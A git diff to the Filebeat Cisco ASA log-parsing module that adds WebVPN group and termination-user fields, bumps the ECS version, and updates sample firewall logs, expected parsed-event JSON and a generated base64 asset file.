a/x-pack/filebeat/module/cisco/asa/_meta/fields.yml b/x-pack/filebeat/module/cisco/asa/_meta/fields.yml index b3bb3b5eb1d..f41b0383a11 100644 --- a/x-pack/filebeat/module/cisco/asa/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/asa/_meta/fields.yml @@ -175,3 +175,15 @@ type: keyword description: > The total count of burst rate hits since the object was created or cleared + + - name: termination_user + default_field: false + type: keyword + description: > + AAA name of user requesting termination + + - name: webvpn.group_name + type: keyword + default_field: false + description: > + The WebVPN group name the user belongs to diff --git a/x-pack/filebeat/module/cisco/asa/config/input.yml b/x-pack/filebeat/module/cisco/asa/config/input.yml index 5dadd775a99..aab360dc50d 100644 --- a/x-pack/filebeat/module/cisco/asa/config/input.yml +++ b/x-pack/filebeat/module/cisco/asa/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log index 069be4988df..e80287d4093 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log @@ -64,7 +64,7 @@ Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FC Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested -Apr 27 02:03:03 dev01: %ASA-4-722051: Group some-policy User testuser IP 8.8.8.8 IPv4 Address 8.8.4.4 IPv6 address 2001:4860:4860::8888 assigned to session +Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested. Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout. Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23 diff --git a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json index 2578835b3d0..7c3e3b868b1 100644 --- a/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/additional_messages.log-expected.json @@ -45,7 +45,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -103,7 +105,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -116,6 +120,8 @@ ] }, { + "cisco.asa.icmp_code": 3, + "cisco.asa.icmp_type": 3, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", @@ -151,6 +157,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -250,6 +257,8 @@ ] }, { + "cisco.asa.icmp_code": 1, + "cisco.asa.icmp_type": 3, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", @@ -285,6 +294,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -340,7 +350,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.8", + "192.168.2.2", + "8.8.5.4" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -579,9 +591,10 @@ ] }, { + "cisco.asa.icmp_code": 0, + "cisco.asa.icmp_type": 8, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302021", - "cisco.asa.source_username": "type", "destination.address": "192.168.2.2", "destination.ip": "192.168.2.2", "event.action": "flow-expiration", @@ -615,6 +628,7 @@ ], "related.ip": [ "10.10.10.10", + "8.8.8.8", "192.168.2.2" ], "service.type": "cisco", @@ -749,6 +763,7 @@ ], "related.ip": [ "10.192.46.90", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -761,6 +776,8 @@ ] }, { + "cisco.asa.icmp_code": 3, + "cisco.asa.icmp_type": 3, "cisco.asa.mapped_source_ip": "8.8.8.8", "cisco.asa.message_id": "302020", "destination.address": "10.10.10.10", @@ -796,6 +813,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -826,6 +844,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2021-05-05T20:29:32.000Z", "event.timezone": "-02:00", @@ -909,6 +928,7 @@ ], "related.ip": [ "192.168.2.2", + "8.8.8.8", "10.10.10.10" ], "service.type": "cisco", @@ -1237,7 +1257,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1295,7 +1317,9 @@ ], "related.ip": [ "10.10.10.10", - "192.168.2.2" + "8.8.8.4", + "192.168.2.2", + "8.8.8.8" ], "service.type": "cisco", "source.address": "10.10.10.10", @@ -1603,6 +1627,156 @@ "forwarded" ] }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw1111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4472, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw1111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.168.2.2", + "destination.ip": "192.168.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4631, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01" + ], + "related.ip": [ + "10.10.10.10", + "192.168.2.2" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, + { + "cisco.asa.destination_interface": "net", + "cisco.asa.message_id": "302022", + "cisco.asa.source_interface": "fw111", + "destination.address": "192.1682.2.2", + "destination.domain": "192.1682.2.2", + "destination.port": 10051, + "event.action": "firewall-rule", + "event.category": [ + "network" + ], + "event.code": 302022, + "event.dataset": "cisco.asa", + "event.kind": "event", + "event.module": "cisco", + "event.original": "%ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "event.severity": 6, + "event.timezone": "-02:00", + "event.type": [ + "info" + ], + "fileset.name": "asa", + "host.hostname": "dev01", + "input.type": "log", + "log.level": "informational", + "log.offset": 4791, + "network.iana_number": 6, + "network.transport": "tcp", + "observer.egress.interface.name": "fw111", + "observer.hostname": "dev01", + "observer.ingress.interface.name": "net", + "observer.product": "asa", + "observer.type": "firewall", + "observer.vendor": "Cisco", + "related.hosts": [ + "dev01", + "192.1682.2.2" + ], + "related.ip": [ + "10.10.10.10" + ], + "service.type": "cisco", + "source.address": "10.10.10.10", + "source.ip": "10.10.10.10", + "source.port": 38540, + "tags": [ + "cisco-asa", + "forwarded" + ] + }, { "cisco.asa.destination_interface": "net", "cisco.asa.message_id": "302023", @@ -1633,7 +1807,7 @@ "input.type": "log", "log.level": "informational", "log.offset": 4949, - "network.bytes": "0", + "network.bytes": 0, "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "fw111", @@ -1688,7 +1862,7 @@ "input.type": "log", "log.level": "informational", "log.offset": 5142, - "network.bytes": "0", + "network.bytes": 0, "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "net", @@ -2478,6 +2652,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "event.reason": "Connection timeout", "event.severity": 6, "event.start": "2021-04-27T05:12:21.000Z", "event.timezone": "-02:00", @@ -3061,8 +3236,9 @@ ] }, { - "cisco.asa.assigned_ip": "8.8.4.4", + "cisco.asa.assigned_ip": "192.168.50.5", "cisco.asa.message_id": "722051", + "cisco.asa.webvpn.group_name": "VPN5Policy", "event.action": "firewall-rule", "event.category": [ "network" @@ -3071,7 +3247,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-722051: Group some-policy User testuser IP 8.8.8.8 IPv4 Address 8.8.4.4 IPv6 address 2001:4860:4860::8888 assigned to session", + "event.original": "%ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session", "event.severity": 4, "event.timezone": "-02:00", "event.type": [ @@ -3090,22 +3266,15 @@ "dev01" ], "related.ip": [ - "8.8.8.8" + "192.168.50.3" ], "related.user": [ - "testuser" + "john" ], "service.type": "cisco", - "source.address": "8.8.8.8", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "8.8.8.8", - "source.user.name": "testuser", + "source.address": "192.168.50.3", + "source.ip": "192.168.50.3", + "source.user.name": "john", "tags": [ "cisco-asa", "forwarded" @@ -3113,6 +3282,7 @@ }, { "cisco.asa.message_id": "716002", + "cisco.asa.webvpn.group_name": "another-policy", "event.action": "firewall-rule", "event.category": [ "network" @@ -3122,7 +3292,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", - "event.reason": "User Requested.", + "event.reason": "User Requested", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -3132,7 +3302,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 9683, + "log.offset": 9680, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3164,6 +3334,7 @@ }, { "cisco.asa.message_id": "716002", + "cisco.asa.webvpn.group_name": "another-policy", "event.action": "firewall-rule", "event.category": [ "network" @@ -3173,7 +3344,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", - "event.reason": "Idle timeout.", + "event.reason": "Idle timeout", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ @@ -3183,7 +3354,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 9810, + "log.offset": 9807, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3240,7 +3411,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "error", - "log.offset": 9937, + "log.offset": 9934, "network.iana_number": 6, "network.transport": "tcp", "observer.hostname": "dev01", diff --git a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json index bcd775e4e1e..7dde207d2b0 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json @@ -5,6 +5,7 @@ "cisco.asa.message_id": "302016", "cisco.asa.source_interface": "Outside", "cisco.asa.source_username": "(LOCAL\\Elastic)", + "cisco.asa.termination_user": "zzzzzz", "destination.address": "10.233.123.123", "destination.ip": "10.233.123.123", "destination.port": 53, diff --git a/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json index ea4dcecdef3..355b9450453 100644 --- a/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/asa.log-expected.json @@ -133,6 +133,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -193,6 +194,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -253,6 +255,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -313,6 +316,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -373,6 +377,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -433,6 +438,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -493,6 +499,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -553,6 +560,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -613,6 +621,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -673,6 +682,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -733,6 +743,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -793,6 +804,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -853,6 +865,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -913,6 +926,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -973,6 +987,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -1033,6 +1048,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:45.000Z", "event.timezone": "-02:00", @@ -1093,6 +1109,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "event.reason": "SYN Timeout", "event.severity": 6, "event.start": "2018-10-10T14:34:26.000Z", "event.timezone": "-02:00", @@ -2791,6 +2808,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -3781,6 +3799,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -4509,6 +4528,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:29:31.000Z", "event.timezone": "-02:00", @@ -4569,6 +4589,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", diff --git a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json index 70df45cbf91..e03c1a5c403 100644 --- a/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/hostnames.log-expected.json @@ -36,6 +36,9 @@ "target.destination.hostname.local", "Prod-host.name.addr" ], + "related.ip": [ + "10.0.55.66" + ], "service.type": "cisco", "source.domain": "Prod-host.name.addr", "source.nat.ip": "10.0.55.66", @@ -46,9 +49,10 @@ }, { "@timestamp": "2011-06-04T21:59:52.000-02:00", + "cisco.asa.icmp_code": 0, + "cisco.asa.icmp_type": 8, "cisco.asa.mapped_source_ip": "192.0.2.134", "cisco.asa.message_id": "302021", - "cisco.asa.source_username": "type", "destination.address": "192.0.2.15", "destination.ip": "192.0.2.15", "event.action": "flow-expiration", diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json index b2c1d4cb876..34f1549272a 100644 --- a/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/asa/test/sample.log-expected.json @@ -451,6 +451,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -554,7 +555,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -812,7 +814,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -2254,6 +2257,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:01:31.000Z", "event.timezone": "-02:00", @@ -2308,6 +2312,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2362,6 +2367,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2667,6 +2673,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-10T10:01:54.000Z", "event.timezone": "-02:00", @@ -3335,6 +3342,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3393,6 +3401,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", @@ -3450,6 +3459,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/fields.go b/x-pack/filebeat/module/cisco/fields.go index 4d465edfa97..f3ece1f34c2 100644 --- a/x-pack/filebeat/module/cisco/fields.go +++ b/x-pack/filebeat/module/cisco/fields.go @@ -19,5 +19,5 @@ func init() { // AssetCisco returns asset data. // This is the base64 encoded gzipped contents of module/cisco. func AssetCisco() string { - return "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